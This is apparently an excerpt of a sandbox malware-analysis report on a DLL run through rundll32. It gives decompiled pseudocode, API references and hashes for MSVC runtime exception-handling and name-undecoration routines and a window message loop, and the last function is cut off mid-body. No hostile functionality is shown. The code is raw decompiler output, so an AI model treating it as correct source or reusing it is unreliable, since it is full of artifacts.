					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						_t322 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t322 = 0;
						if(_t274[0x1c] != 0) {
							L24:
							_t279 = _a12;
							_v12 = _t279;
							goto L26;
						} else {
							_t226 = E10005A3D(_t274, _t279, _t303, 0);
							if( *((intOrPtr*)(_t226 + 0x10)) == 0) {
								L63:
								return _t226;
							} else {
								_t274 =  *(E10005A3D(_t274, _t279, _t303, 0) + 0x10);
								_t265 = E10005A3D(_t274, _t279, _t303, 0);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t265 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t322) {
									goto L69;
								} else {
									if( *((intOrPtr*)(E10005A3D(_t274, _t279, _t303, _t322) + 0x1c)) == _t322) {
										L25:
										_t279 = _v12;
										_t203 = _v16;
										L26:
										_v56 = _t308;
										_v52 = _t322;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L59:
											__eflags = _t308[3] - _t322;
											if(_t308[3] <= _t322) {
												goto L62;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L69;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t203);
													_push(_t308);
													_push(_a16);
													_push(_t279);
													_push(_a8);
													_push(_t274);
													L70();
													_t338 = _t338 + 0x20;
													goto L62;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L59;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L31:
													__eflags = _t308[3] - _t322;
													if(_t308[3] > _t322) {
														_push(_a28);
														E10004CB7(_t274, _t279, _t308, _t322,  &_v72,  &_v56, _t203, _a16, _t308);
														_t303 = _v68;
														_t338 = _t338 + 0x18;
														_t252 = _v72;
														_v48 = _t252;
														_v20 = _t303;
														__eflags = _t303 - _v60;
														if(_t303 < _v60) {
															_t294 = _t303 * 0x14;
															__eflags = _t294;
															_v36 = _t294;
															do {
																_t295 = 5;
																_t255 = memcpy( &_v108,  *((intOrPtr*)( *_t252 + 0x10)) + _t294, _t295 << 2);
																_t338 = _t338 + 0xc;
																__eflags = _v108 - _t255;
																if(_v108 <= _t255) {
																	__eflags = _t255 - _v104;
																	if(_t255 <= _v104) {
																		_t298 = 0;
																		_v24 = 0;
																		__eflags = _v96;
																		if(_v96 != 0) {
																			_t257 =  *(_t274[0x1c] + 0xc);
																			_t306 =  *_t257;
																			_t258 =  &(_t257[1]);
																			__eflags = _t258;
																			_v40 = _t258;
																			_t259 = _v92;
																			_v44 = _t306;
																			_v28 = _t259;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t321 = _v40;
																				_t333 = _t306;
																				__eflags = _t333;
																				if(_t333 <= 0) {
																					goto L42;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t260 =  &_v88;
																						_push( *_t321);
																						_push(_t260);
																						L89();
																						_t338 = _t338 + 0xc;
																						__eflags = _t260;
																						if(_t260 != 0) {
																							break;
																						}
																						_t333 = _t333 - 1;
																						_t321 = _t321 + 4;
																						__eflags = _t333;
																						if(_t333 > 0) {
																							continue;
																						} else {
																							_t298 = _v24;
																							_t259 = _v28;
																							_t306 = _v44;
																							goto L42;
																						}
																						goto L45;
																					}
																					_push(_a24);
																					_v5 = 1;
																					_push(_v32);
																					E10005D39(_t306, _t274, _a8, _v12, _a16, _a20,  &_v88,  *_t321,  &_v108, _a28, _a32);
																					_t338 = _t338 + 0x30;
																				}
																				L45:
																				_t303 = _v20;
																				goto L46;
																				L42:
																				_t298 = _t298 + 1;
																				_t259 = _t259 + 0x10;
																				_v24 = _t298;
																				_v28 = _t259;
																				__eflags = _t298 - _v96;
																			} while (_t298 != _v96);
																			goto L45;
																		}
																	}
																}
																L46:
																_t303 = _t303 + 1;
																_t252 = _v48;
																_t294 = _v36 + 0x14;
																_v20 = _t303;
																_v36 = _t294;
																__eflags = _t303 - _v60;
															} while (_t303 < _v60);
															_t308 = _a20;
															_t322 = 0;
															__eflags = 0;
														}
													}
													__eflags = _a24;
													if(_a24 != 0) {
														_push(1);
														E1000544E();
														_t279 = _t274;
													}
													__eflags = _v5;
													if(_v5 != 0) {
														L62:
														_t226 = E10005A3D(_t274, _t279, _t303, _t322);
														__eflags =  *((intOrPtr*)(_t226 + 0x1c)) - _t322;
														if( *((intOrPtr*)(_t226 + 0x1c)) != _t322) {
															goto L69;
														} else {
															goto L63;
														}
													} else {
														__eflags = ( *_t308 & 0x1fffffff) - 0x19930521;
														if(( *_t308 & 0x1fffffff) < 0x19930521) {
															goto L62;
														} else {
															__eflags = _t308[7];
															if(_t308[7] != 0) {
																L55:
																_t230 = _t308[8] >> 2;
																__eflags = _t230 & 0x00000001;
																if((_t230 & 0x00000001) == 0) {
																	_push(_t308[7]);
																	_t231 = E100068F0(_t274);
																	_pop(_t279);
																	__eflags = _t231;
																	if(_t231 == 0) {
																		goto L66;
																	} else {
																		goto L62;
																	}
																} else {
																	 *(E10005A3D(_t274, _t279, _t303, _t322) + 0x10) = _t274;
																	_t240 = E10005A3D(_t274, _t279, _t303, _t322);
																	_t290 = _v12;
																	 *((intOrPtr*)(_t240 + 0x14)) = _v12;
																	goto L64;
																}
															} else {
																_t247 = _t308[8] >> 2;
																__eflags = _t247 & 0x00000001;
																if((_t247 & 0x00000001) == 0) {
																	goto L62;
																} else {
																	__eflags = _a28;
																	if(_a28 != 0) {
																		goto L62;
																	} else {
																		goto L55;
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L31;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L59;
														} else {
															goto L31;
														}
													}
												}
											}
										}
									} else {
										_v20 =  *((intOrPtr*)(E10005A3D(_t274, _t279, _t303, _t322) + 0x1c));
										_t270 = E10005A3D(_t274, _t279, _t303, _t322);
										_push(_v20);
										 *(_t270 + 0x1c) = _t322;
										_t271 = E100068F0(_t274);
										_pop(_t290);
										if(_t271 != 0) {
											goto L25;
										} else {
											_t308 = _v20;
											_t359 =  *_t308 - _t322;
											if( *_t308 <= _t322) {
												L64:
												E1001200F(_t274, _t290, _t303, __eflags);
											} else {
												_t300 = _t322;
												_v20 = _t322;
												while(E100064CB( *((intOrPtr*)(_t300 + _t308[1] + 4)), _t359, 0x1004da94) == 0) {
													_t322 = _t322 + 1;
													_t290 = _v20 + 0x10;
													_v20 = _v20 + 0x10;
													_t359 = _t322 -  *_t308;
													if(_t322 >=  *_t308) {
														goto L64;
													} else {
														continue;
													}
													goto L65;
												}
											}
											L65:
											_push(1);
											_push(_t274);
											E1000544E();
											_t279 =  &_v68;
											E1000647B( &_v68);
											E10004C0B( &_v68, 0x1004b054);
											L66:
											 *(E10005A3D(_t274, _t279, _t303, _t322) + 0x10) = _t274;
											_t233 = E10005A3D(_t274, _t279, _t303, _t322);
											_t279 = _v12;
											 *(_t233 + 0x14) = _v12;
											_t234 = _a32;
											__eflags = _t234;
											if(_t234 == 0) {
												_t234 = _a8;
											}
											E10004E9B(_t279, _t234, _t274);
											E100067E5(_a8, _a16, _t308);
											_t237 = E10006A10(_t308);
											_t338 = _t338 + 0x10;
											_push(_t237);
											E1000675C(_t274, _t279, _t303, _t308, _t322, __eflags);
											goto L69;
										}
									}
								}
							}
						}
					}
				}
			}

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 10005EB4
type_info::operator==.LIBVCRUNTIME ref: 10005EDB
___TypeMatch.LIBVCRUNTIME ref: 10005FE7
IsInExceptionSpec.LIBVCRUNTIME ref: 100060C2
_UnwindNestedFrames.LIBCMT ref: 10006149
CallUnexpected.LIBVCRUNTIME ref: 10006164

Strings

csm, xrefs: 10005DF4
csm, xrefs: 10005F12
csm, xrefs: 10005E61

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 7d246a1fdf75e9af7c05d0d311cdd578202093742d17d7a48fe81ccd6d4acd59
Instruction ID: db32c1024e391476e5cdf26b8d57ef01a1901657407386c4c16bdeae4e47b44c
Opcode Fuzzy Hash: 7d246a1fdf75e9af7c05d0d311cdd578202093742d17d7a48fe81ccd6d4acd59
Instruction Fuzzy Hash: 91C18E7590024ADFEF15CF94C88099FBBB6FF08395F214569F8056B20AD732EA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF24, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 180
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1000CF24(void* __edx, char** _a4, char _a8, char _a12) {
				signed int _v8;
				char _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char _v44;
				char** _v48;
				char _v56;
				char _v64;
				void* __ebp;
				signed int _t50;
				char** _t56;
				char** _t57;
				char** _t59;
				char* _t65;
				char** _t76;
				intOrPtr* _t77;
				intOrPtr _t78;
				char** _t82;
				char* _t83;
				char _t84;
				signed int* _t112;
				char* _t115;
				intOrPtr* _t117;
				signed int* _t118;
				intOrPtr _t120;
				intOrPtr* _t121;
				signed int _t123;

				_t113 = __edx;
				_t50 =  *0x1004d054; // 0xda1f8931
				_v8 = _t50 ^ _t123;
				_t82 = _a4;
				_t117 =  *0x1004e004; // 0x0
				_v48 = _t82;
				_t84 =  *_t117;
				_t53 = _t84 + 0xffffffd0;
				_v33 = _t84;
				if(_t84 + 0xffffffd0 > 9) {
					if(_t84 != 0x3f) {
						if(E1000D3E3(_t117, "template-parameter-", 0x13) != 0) {
							if(E1000D3E3(_t117, "generic-type-", 0xd) != 0) {
								if(_a12 == 0 || _v33 != 0x40) {
									_t56 = E100071BE( &_v56, 0x1004e004, 0x40);
									L20:
									_t83 = _t56[1];
									_t115 =  *_t56;
								} else {
									_t115 = 0;
									_t83 = 0;
									 *0x1004e004 = _t117 + 1;
								}
								goto L21;
							}
							_v32 = "`generic-type-";
							_t120 = _t117 + 0xd;
							_v28 = 0xe;
							L9:
							 *0x1004e004 = _t120;
							E1000BC98(_t113,  &_v44);
							if(( *0x1004e00c & 0x00004000) == 0 ||  *0x1004e014 == 0) {
								E100076A6(E1000723E( &_v56,  &_v32),  &_v32,  &_v44);
								_t65 =  &_v64;
								goto L14;
							} else {
								E1000BD27( &_v44,  &_v24, 0x10);
								_t121 =  *0x1004e014; // 0x0
								 *0x1004223c(E10010036( &_v44,  &_v24));
								if( *_t121() == 0) {
									E100076A6(E1000723E( &_v64,  &_v32),  &_v32,  &_v44);
									_t65 =  &_v56;
									L14:
									_t56 = E100076C8( &_v32, _t65, 0x27);
									goto L20;
								}
								_v28 = 0;
								_push(_v28);
								_t56 = E10006E34( &_v44, _t71);
								goto L20;
							}
						}
						_v32 = "`template-parameter-";
						_t120 = _t117 + 0x13;
						_v28 = 0x14;
						goto L9;
					} else {
						_t76 = E1000C18C(__edx,  &_v44, 0);
						_t115 =  *_t76;
						_t83 = _t76[1];
						_t77 =  *0x1004e004; // 0x0
						_v32 = _t115;
						_v28 = _t83;
						_t78 = _t77 + 1;
						 *0x1004e004 = _t78;
						if( *_t77 != 0x40) {
							_t79 = _t78 - 1;
							 *0x1004e004 = _t78 - 1;
							E10007596( &_v32, (0 |  *_t79 != 0x00000000) + 1);
							_t83 = _v28;
							_t115 = _v32;
						}
						L21:
						if(_a8 != 0) {
							_t118 =  *0x1004dffc; // 0x0
							if( *_t118 != 9 && _t115 != 0) {
								_t59 = E1000A9CF(0x1004e020, 8);
								if(_t59 != 0) {
									 *_t59 = _t115;
									_t59[1] = _t83;
									 *_t118 =  *_t118 + 1;
									 *(_t118 + 4 +  *_t118 * 4) = _t59;
								}
							}
						}
						_t57 = _v48;
						 *_t57 = _t115;
						_t57[1] = _t83;
						goto L27;
					}
				} else {
					_t112 =  *0x1004dffc; // 0x0
					 *0x1004e004 = _t117 + 1;
					E100075C8(_t112, _t82, _t53);
					_t57 = _t82;
					L27:
					return E100037EA(_t57, _v8 ^ _t123, _t113);
				}
			}

APIs

Replicator::operator[].LIBVCRUNTIME ref: 1000CF61
DName::operator=.LIBVCRUNTIME ref: 1000CFB3

Strings

generic-type-, xrefs: 1000CFEC
@, xrefs: 1000D0C9
template-parameter-, xrefs: 1000CFC5

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: @$generic-type-$template-parameter-
API String ID: 3211817929-1320211309
Opcode ID: 138bd7d1e047c867c0a897e6d0aad874662d5c1623397badb2a104a952a59643
Instruction ID: e026a952384d41eb90ae7b1f9d44a7b3bc4911ee2c14a530ba52aab493f896e0
Opcode Fuzzy Hash: 138bd7d1e047c867c0a897e6d0aad874662d5c1623397badb2a104a952a59643
Instruction Fuzzy Hash: 48611771D002499FEB10DF54D985BEEBBF8EF09380F10801AE605E7295DB74AD45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1000218B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000218B(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a16) {
				struct tagMSG _v32;
				struct _WNDCLASSEXA _v80;
				void* _t26;
				struct HINSTANCE__* _t39;

				_t39 = _a4;
				LoadStringA(_t39, 0x82, 0x1004db68, 0x64);
				LoadStringA(_t39, 0x81, 0x1004dbd0, 0x64);
				_v80.cbSize = 0x30;
				_v80.style = 3;
				_v80.lpfnWndProc = E10001AC4;
				_v80.cbClsExtra = 0;
				_v80.cbWndExtra = 0;
				_v80.hInstance = _t39;
				_v80.hIcon = 0;
				_v80.hCursor = LoadCursorA(0, 0x7f00);
				_v80.hbrBackground = 6;
				_v80.lpszMenuName = 0x81;
				_v80.lpszClassName = 0x1004dbd0;
				_v80.hIconSm = 0;
				RegisterClassExA( &_v80);
				_t26 = E100012B1(_t39, _a16);
				if(_t26 != 0) {
					if(GetMessageA( &_v32, 0, 0, 0) == 0) {
						L4:
						return _v32.wParam;
					}
					do {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
					} while (GetMessageA( &_v32, 0, 0, 0) != 0);
					goto L4;
				}
				return _t26;
			}

APIs

LoadStringA.USER32 ref: 100021AA
LoadStringA.USER32 ref: 100021BA
LoadCursorA.USER32 ref: 100021E5
RegisterClassExA.USER32 ref: 10002206

Part of subcall function 100012B1: GetVersionExA.KERNEL32(?), ref: 100012E0
Part of subcall function 100012B1: CreateWindowExA.USER32 ref: 1000131E
Part of subcall function 100012B1: ShowWindow.USER32(00000000,?), ref: 1000132E
Part of subcall function 100012B1: UpdateWindow.USER32 ref: 10001335

GetMessageA.USER32 ref: 10002228
TranslateMessage.USER32 ref: 10002234
DispatchMessageA.USER32 ref: 1000223E
GetMessageA.USER32 ref: 1000224B

Strings

0, xrefs: 100021BE

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Message$LoadWindow$String$ClassCreateCursorDispatchRegisterShowTranslateUpdateVersion
String ID: 0
API String ID: 1669850144-4108050209
Opcode ID: 1c36e70d199e3722fff3a6eed99da0b3f5838ac0bb385f56671e7e76504a532a
Instruction ID: 6fe8cfb5187b65730e66161c813667806370dfcb888eacca90ee75b3e607f7b9
Opcode Fuzzy Hash: 1c36e70d199e3722fff3a6eed99da0b3f5838ac0bb385f56671e7e76504a532a
Instruction Fuzzy Hash: 0721F872D01229AAEB11DFA5DE84EDFBBBCEF49754F11401AF600F2140D7B99902CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10008D42, Relevance: 15.3, APIs: 10, Instructions: 338
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10008D42(signed int* _a4, signed int* _a8) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char* _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				intOrPtr* _t134;
				signed int* _t136;
				signed char _t141;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				signed int* _t159;
				signed int* _t160;
				signed int _t161;
				signed char _t180;
				signed int _t181;
				signed int* _t187;
				signed int _t188;
				signed int _t189;
				void* _t197;
				signed int _t203;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t208;
				signed char _t210;
				signed char _t211;
				signed int _t221;
				intOrPtr _t226;
				intOrPtr* _t228;
				signed int _t229;
				void* _t232;
				signed int _t234;
				void* _t244;

				_t134 =  *0x1004e004; // 0x0
				_t211 =  *_t134;
				if(_t211 == 0) {
					E10007662(_t211, _a4, 1, _a8);
					L93:
					_t136 = _a4;
					L94:
					return _t136;
				}
				_v16 = _v16 & 0x00000000;
				_t3 = _t134 + 1; // 0x1
				_t228 = _t3;
				_v12 = _v12 & 0x00000000;
				_t203 = _t211 & 0x000000ff;
				 *0x1004e004 = _t228;
				_t232 = 2;
				_t244 = _t203 - 0x4e;
				if(_t244 > 0) {
					__eflags = _t203 - 0x4f;
					if(__eflags == 0) {
						_v32 = "long ";
						_v28 = 5;
						E10007500( &_v16,  &_v32);
						L79:
						_v32 = "double";
						_t213 =  &_v16;
						_v28 = 6;
						E10007748( &_v16,  &_v32);
						L80:
						_t141 = 0;
						_t204 = _t203 - 0x43;
						if(_t204 == 0) {
							_v32 = "signed ";
							_v28 = 7;
							L88:
							_t213 = E1000723E( &_v24,  &_v32);
							E100076A6(_t143,  &_v32,  &_v16);
							_v16 = _v32;
							_v12 = _v28;
							L89:
							_t147 = _a8;
							if( *_a8 != 0) {
								E100077A0( &_v16, E10007637(_t213,  &_v32, 0x20, _t147));
							}
							_t136 = _a4;
							 *_t136 = _v16;
							_t136[1] = _v12;
							goto L94;
						}
						_t205 = _t204 - _t232;
						if(_t205 == 0) {
							L33:
							_v32 = "unsigned ";
							_v28 = 9;
							goto L88;
						}
						_t206 = _t205 - _t232;
						if(_t206 == 0) {
							goto L33;
						}
						_t207 = _t206 - _t232;
						if(_t207 == 0) {
							goto L33;
						}
						_t208 = _t207 - _t232;
						if(_t208 == 0) {
							goto L33;
						}
						if(_t208 != 0x14) {
							goto L89;
						}
						L28:
						_t152 = (_t141 & 0x000000ff) - 0x45;
						if(_t152 == 0) {
							goto L33;
						}
						_t153 = _t152 - _t232;
						if(_t153 == 0) {
							goto L33;
						}
						_t154 = _t153 - _t232;
						if(_t154 == 0) {
							goto L33;
						}
						_t155 = _t154 - _t232;
						if(_t155 == 0 || _t155 == _t232) {
							goto L33;
						} else {
							goto L89;
						}
					}
					if(__eflags <= 0) {
						L76:
						 *0x1004e004 = _t228 - 1;
						_t159 = E10009F87( &_v32);
						_t213 =  *_t159;
						_t229 = _t159[1];
						_v16 = _t213;
						_v12 = _t229;
						__eflags = _t213;
						if(_t213 != 0) {
							goto L80;
						}
						L59:
						_t136 = _a4;
						 *_t136 = _t213;
						_t136[1] = _t229;
						goto L94;
					}
					__eflags = _t203 - 0x53;
					if(_t203 <= 0x53) {
						_t210 = _t203 & 0x00000003;
						__eflags = _t210;
						L65:
						_t160 = _a8;
						_v16 = _v16 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_t221 =  *_t160;
						_t161 = _t160[1];
						_v32 = _t221;
						_v28 = _t161;
						__eflags = _t210 - 0xfffffffe;
						if(_t210 != 0xfffffffe) {
							__eflags = _t221;
							if(_t221 == 0) {
								_t234 = _t210 & 0x00000002;
								__eflags = _t210 & 0x00000001;
								if((_t210 & 0x00000001) == 0) {
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = "volatile";
										_v20 = 8;
										E10007500( &_v16,  &_v24);
									}
								} else {
									_v24 = "const";
									_v20 = 5;
									E10007500( &_v16,  &_v24);
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = " volatile";
										_v20 = 9;
										E10007748( &_v16,  &_v24);
									}
								}
							}
							E1000B576(_t210, _a4,  &_v16,  &_v32, 1);
							goto L93;
						}
						_v28 = _t161 | 0x00000800;
						E1000B576(_t210,  &_v24,  &_v16,  &_v32, 0);
						_t229 = _v20;
						__eflags = 0x00000800 & _t229;
						if((0x00000800 & _t229) == 0) {
							_v32 = 0x10042dd4;
							_v28 = 2;
							E10007748( &_v24,  &_v32);
							_t229 = _v20;
						}
						_t213 = _v24;
						goto L59;
					}
					__eflags = _t203 - 0x58;
					if(_t203 == 0x58) {
						_v32 = "void";
						_v28 = 4;
						L12:
						_t213 =  &_v16;
						E10007500( &_v16,  &_v32);
						goto L89;
					}
					__eflags = _t203 - 0x5f;
					if(_t203 != 0x5f) {
						goto L76;
					}
					_t180 =  *_t228;
					_t23 = _t228 + 1; // 0x2
					_t226 = _t23;
					_v5 = _t180;
					_t181 = _t180 & 0x000000ff;
					 *0x1004e004 = _t226;
					__eflags = _t181 - 0x4e;
					if(__eflags > 0) {
						__eflags = _t181 - 0x53;
						if(__eflags > 0) {
							__eflags = _t181 - 0x55;
							if(_t181 == 0x55) {
								_v32 = "char32_t";
								L42:
								_v28 = 8;
								L26:
								_t213 =  &_v16;
								E10007500( &_v16,  &_v32);
								L27:
								_t141 = _v5;
								goto L28;
							}
							__eflags = _t181 - 0x57;
							if(_t181 == 0x57) {
								_v32 = "wchar_t";
								L37:
								_v28 = 7;
								goto L26;
							}
							__eflags = _t181 + 0xffffffa8 - 1;
							if(_t181 + 0xffffffa8 > 1) {
								L60:
								_v32 = "UNKNOWN";
								goto L37;
							}
							_t51 = _t226 - 1; // 0x1
							 *0x1004e004 = _t51;
							_t187 = E10009F87( &_v32);
							_t213 =  *_t187;
							_t229 = _t187[1];
							_v16 = _t213;
							_v12 = _t229;
							__eflags = _t213;
							if(_t213 != 0) {
								goto L27;
							}
							goto L59;
						}
						if(__eflags == 0) {
							_v32 = "char16_t";
							goto L42;
						}
						_t188 = _t181 - 0x4f;
						__eflags = _t188;
						if(_t188 == 0) {
							_t210 = 0xfffffffe;
							goto L65;
						}
						_t189 = _t188 - _t232;
						__eflags = _t189;
						if(_t189 == 0) {
							_v32 = "char8_t";
							goto L37;
						}
						__eflags = _t189 != 1;
						if(_t189 != 1) {
							goto L60;
						}
						_v32 = "<unknown>";
						_v28 = 9;
						goto L26;
					}
					if(__eflags == 0) {
						_v32 = "bool";
						_v28 = 4;
						goto L26;
					}
					__eflags = _t181 - 0x47;
					if(_t181 > 0x47) {
						__eflags = _t181 - 0x49;
						if(_t181 <= 0x49) {
							_v32 = "__int32";
							goto L37;
						}
						__eflags = _t181 - 0x4b;
						if(_t181 <= 0x4b) {
							_v32 = "__int64";
							goto L37;
						}
						__eflags = _t181 - 0x4d;
						if(_t181 > 0x4d) {
							goto L60;
						}
						_v32 = "__int128";
						goto L42;
					}
					__eflags = _t181 - 0x46;
					if(_t181 >= 0x46) {
						_v32 = "__int16";
						goto L37;
					}
					__eflags = _t181;
					if(_t181 == 0) {
						_t213 =  &_v16;
						 *0x1004e004 = _t228;
						E10007596( &_v16, 1);
						goto L27;
					}
					__eflags = _t181 - 0x24;
					if(_t181 == 0x24) {
						_v32 = "__w64 ";
						_v28 = 6;
						E10007615(_t226, _a4,  &_v32, E10008D42( &_v24, _a8));
						goto L93;
					}
					__eflags = _t181 + 0xffffffbc - 1;
					if(_t181 + 0xffffffbc > 1) {
						goto L60;
					} else {
						_v32 = "__int8";
						_v28 = 6;
						goto L26;
					}
				}
				if(_t244 == 0) {
					goto L79;
				}
				_t6 = _t203 - 0x43; // -67
				_t197 = _t6;
				if(_t197 > 0xa) {
					goto L76;
				}
				_t7 = _t197 + 0x1000922a; // 0x8bffffe5
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M10009212))) {
					case 0:
						_v32 = "char";
						goto L6;
					case 1:
						_v32 = "short";
						_v28 = 5;
						goto L7;
					case 2:
						_v32 = "int";
						_v28 = 3;
						goto L7;
					case 3:
						_v32 = "long";
						L6:
						_v28 = 4;
						L7:
						_t213 =  &_v16;
						E10007500( &_v16,  &_v32);
						goto L80;
					case 4:
						_v32 = "float";
						_v28 = 5;
						goto L12;
					case 5:
						goto L76;
				}
			}

APIs

shared_ptr.LIBCMT ref: 10008DAE
shared_ptr.LIBCMT ref: 10008DF6
shared_ptr.LIBCMT ref: 10008E8A
operator+.LIBVCRUNTIME ref: 10008EE3
DName::operator=.LIBVCRUNTIME ref: 10008EFB
shared_ptr.LIBCMT ref: 10009145
DName::operator+.LIBCMT ref: 100091B9
operator+.LIBVCRUNTIME ref: 10009202

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID:
API String ID: 1464150960-0
Opcode ID: 3f0597f9030ab65205f9ced627fb8c410918e4c165c87269fa6c19fcfb40e6f4
Instruction ID: b28e2a1fd94149dd2561a11b9f82f89739496a4781773dc4ca3130be31d5303b
Opcode Fuzzy Hash: 3f0597f9030ab65205f9ced627fb8c410918e4c165c87269fa6c19fcfb40e6f4
Instruction Fuzzy Hash: 1CD18FB1D0424BDFEB00CF90C885AEEBBB4FB04380F60816AD955A7289D7799B45CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1000C2ED, Relevance: 15.2, APIs: 10, Instructions: 250
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E1000C2ED(void* __edx, signed int* _a4) {
				signed int _v8;
				long _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				intOrPtr* _t63;
				char* _t64;
				signed int _t72;
				signed int _t78;
				signed int _t84;
				signed int _t85;
				signed int _t89;
				signed int _t124;
				signed int _t126;
				void* _t129;
				signed int* _t164;
				signed int _t165;
				signed int _t166;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t173;
				void* _t176;

				_t163 = __edx;
				_t61 =  *0x1004d054; // 0xda1f8931
				_v8 = _t61 ^ _t173;
				_t63 =  *0x1004e004; // 0x0
				_t124 =  *_t63;
				_t64 = _t63 + 1;
				_t164 = _a4;
				_t165 = _t124;
				 *0x1004e004 = _t64;
				_v28 = _t165;
				_t176 = _t124 - 0x45;
				if(_t176 > 0) {
					__eflags = _t124 - 0x52;
					if(__eflags > 0) {
						__eflags = _t124 - 0x53;
						if(_t124 == 0x53) {
							 *_t164 =  *_t164 & 0x00000000;
							_t58 =  &(_t164[1]);
							 *_t58 = _t164[1] & 0x00000000;
							__eflags =  *_t58;
							L53:
							return E100037EA(_t164, _v8 ^ _t173, _t163);
						}
						__eflags = _t124 - 0x54 - 2;
						if(_t124 - 0x54 > 2) {
							L51:
							_t164[1] = _t164[1] & 0x00000000;
							 *_t164 =  *_t164 & 0x00000000;
							_t164[1] = 2;
							goto L53;
						}
						L38:
						E1000BC98(_t163,  &_v40);
						E1000BD27( &_v40,  &_v24, 0x10);
						_t72 = E10010036( &_v40,  &_v24);
						__eflags =  *0x1004e00c & 0x00004000;
						_t166 = _t72;
						if(( *0x1004e00c & 0x00004000) == 0) {
							L42:
							swprintf( &_v24, 0x10, "%d", _t166 & 0x00000fff);
							_v36 = 0;
							_push(_v36);
							E10006DC1( &_v40,  &_v24);
							_t78 = _v28 - 0x52;
							__eflags = _t78;
							if(_t78 == 0) {
								L50:
								_v32 = "`template-type-parameter-";
								L49:
								_v28 = 0x19;
								L47:
